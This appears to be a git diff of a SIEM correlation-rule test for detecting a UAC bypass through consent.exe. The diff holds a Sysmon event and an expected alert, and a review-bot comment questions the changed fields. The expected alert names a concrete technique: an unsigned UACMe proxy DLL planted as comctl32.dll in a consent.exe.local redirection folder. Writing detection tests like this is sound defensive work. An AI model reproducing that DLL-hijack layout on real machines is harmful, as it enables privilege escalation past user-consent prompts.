diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc
index fbcb7478..4b12db75 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc 
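Review bot: The only semantic change in the new expectation is `"generator.type":null` replacing `"generator.type": "correlationengine"`, and neither the hunk nor the one-line commit message says why the correlation engine no longer stamps this field; if `null` here means "must be absent" rather than "not compared", the test now encodes one engine version's output and will need another "fix" on the next one. A `#` line above the expect recording what it was regenerated against would make that reviewable, e.g. `# expect regenerated against <engine/taxonomy version>; generator.type is no longer set on correlation events`. The same pattern, `"asset_ids":null` replacing the asset list, appears in the UAC_Bypass_Via_Consent test_3.sc hunk of the next patch and should carry the same note. Re-emitting the whole expect as minified JSON also hides the single changed key in the diff; keeping the original spacing would have shown it on its own.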
@@ -2,5 +2,4 @@
 {"_checkpoint": 57615712010, "_meta": {"id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": 
"00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", 
"object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53"}
 # Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
-expect 1 {"action": "start", "alert.key": "consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": 
"Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "subject.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "subject.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.id": "2328", "subject.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "subject.process.name": "consent.exe", "subject.process.original_name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "subject.process.parent.id": "368", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.3232 (WinBuild.160101.0800)"}
-
+expect 1 
{"action":"start","alert.key":"consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","asset_ids":null,"category.generic":"Attack","category.high":"Privilege Escalation","category.low":"Bypass User Account Control","correlation_name":"UAC_Bypass_Via_Consent","correlation_type":"event","datafield6":"20fff121-f3f7-647d-e703-000000000000","event_src.asset":"1864e292-4880-0001-0000-000000000007","event_src.category":"Other","event_src.fqdn":"wks05.example.com","event_src.host":"wks05.example.com","event_src.hostname":"wks05","event_src.rule":"-","event_src.subsys":"Microsoft-Windows-Sysmon/Operational","event_src.title":"sysmon","event_src.vendor":"microsoft","importance":"medium","incident.aggregation.key":"UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","incident.aggregation.timeout":7200,"incident.category":"Undefined","incident.severity":"medium","object":"module","object.process.fullpath":"c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll","object.process.hash":"IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80","object.process.hash.md5":"9E5AED3F57CEBC5154F9373B2BB9BA05","object.process.hash.sha256":"FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80","object.process.meta":"Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous 
Environments","object.process.name":"comctl32.dll","object.process.original_name":"Ikazuchi.dll","object.process.path":"c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\","object.property":"signature status","object.value":"not signed","status":"success","subject":"process","subject.account.domain":"nt authority","subject.account.id":"synthetic:system@nt authority","subject.account.name":"system","subject.account.session_id":"999","subject.process.chain":"consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe","subject.process.cmdline":"consent.exe 368 272 00000285D6BE22C0","subject.process.cwd":"C:\\Windows\\system32\\","subject.process.fullpath":"c:\\windows\\system32\\consent.exe","subject.process.guid":"20fff121-f8dd-647d-8401-000000003900","subject.process.hash":"IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C","subject.process.hash.md5":"C67713C28BB97E685FEB88FFAEB96788","subject.process.hash.sha256":"6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C","subject.process.id":"2328","subject.process.meta":"Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation","subject.process.name":"consent.exe","subject.process.original_name":"consent.exe","subject.process.parent.cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p","subject.process.parent.fullpath":"c:\\windows\\system32\\svchost.exe","subject.process.parent.guid":"20fff121-f3f8-647d-1300-000000003900","subject.process.parent.id":"368","subject.process.parent.name":"svchost.exe","subject.process.parent.path":"c:\\windows\\system32\\","subject.process.path":"c:\\windows\\system32\\","subject.process.version":"10.0.17763.3232 (WinBuild.160101.0800)"} \ No newline at end of file
